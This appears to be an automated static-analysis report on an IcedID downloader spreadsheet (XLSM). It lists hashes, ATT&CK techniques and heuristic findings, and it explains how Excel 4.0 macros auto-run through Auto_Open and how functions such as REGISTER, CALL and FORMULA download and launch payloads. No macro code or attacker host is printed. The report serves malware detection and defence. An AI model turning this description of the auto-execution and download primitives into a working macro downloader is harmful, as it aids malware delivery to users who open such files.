IcedID — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 edac2184bd24dac2…

MALICIOUS

Office (OOXML) / .XLSM

329.9 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300
MD5: 3d2063691d4b135494f57e9dc99ea05a SHA-1: d7a94b522e612dd3f28942b41bc93131487688b7 SHA-256: edac2184bd24dac22d0b946b555af58009496b4bc1ef6367799f15b12312cd21
250 Risk Score

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK
T1059.005 PowerShell T1204.002 Malicious File T1059.001 PowerShell T1059.003 Windows Command Shell

The sample is an XLSM file containing Excel 4.0 macros, as indicated by multiple critical heuristic firings. These macros utilize dangerous functions like FORMULA and REGISTER, which are known primitives for downloading and executing payloads. The ClamAV detection explicitly names this as a downloader for the IcedID family. No document body text was available for analysis, but the presence of these macro capabilities strongly suggests a malicious download and execution chain.

Heuristics 6

  • Excel 4.0 macro sheet (10 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: FORMULA, GOTO, REGISTER, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 10 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — context-specific rules above attribute URLs they actually evaluated; this rule lists URLs that were present in the bytes but were not otherwise tied to a specific finding.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6

Extracted artifacts 10

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml
080bf0d1913eabdbe68c9f55d92e797adb72f1bc1d886b19764eaaf321e40bcc		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml 3139 bytes
xlm_sheet_01.xml
05164b9cb70e0037b39b203885ebd44decd4d50bf6d78fd17a97030d1a30d169		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml 1775 bytes
xlm_sheet_02.xml
57964786069256c3cde5b674c74c83e32c7950a5a81fb86406607b9295962e79		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet3.xml 2200 bytes
xlm_sheet_03.xml
8e54ca9c8231ff6eeb2f34ba5a3783f05811c03293e81c3321c593743fc7d49b		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet4.xml 1453 bytes
xlm_sheet_04.xml
bc63d00a02951125a391dfed946345cbbd3e47d5e732e1f67ca4c1232e853427		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet5.xml 1453 bytes
xlm_sheet_05.xml
1da17f060335fdb67c88a8c48e73de301d69d9af4b69c610a8ce665eeb86cad7		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet6.xml 1452 bytes
xlm_sheet_06.xml
f6b4423280cd454553d841491284df3eff350a07bc739b9add3542ffb6a9432a		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet7.xml 1454 bytes
xlm_sheet_07.xml
bdf4c4c111e091debcc20b38007edacf914de0a9b4c13576faa0148f2eae61a7		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet8.xml 1455 bytes
xlm_sheet_08.xml
a6ea880b09fb36b15b9b86dc98d863447933c1968cf6c7d3bec7927472189efa		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/intlsheet9.xml 1451 bytes
xlm_sheet_09.xml
6b415b149f32e6deb26c4b2856c7977501b27603cf485b4daf15fd4fee7940d5		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1496 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.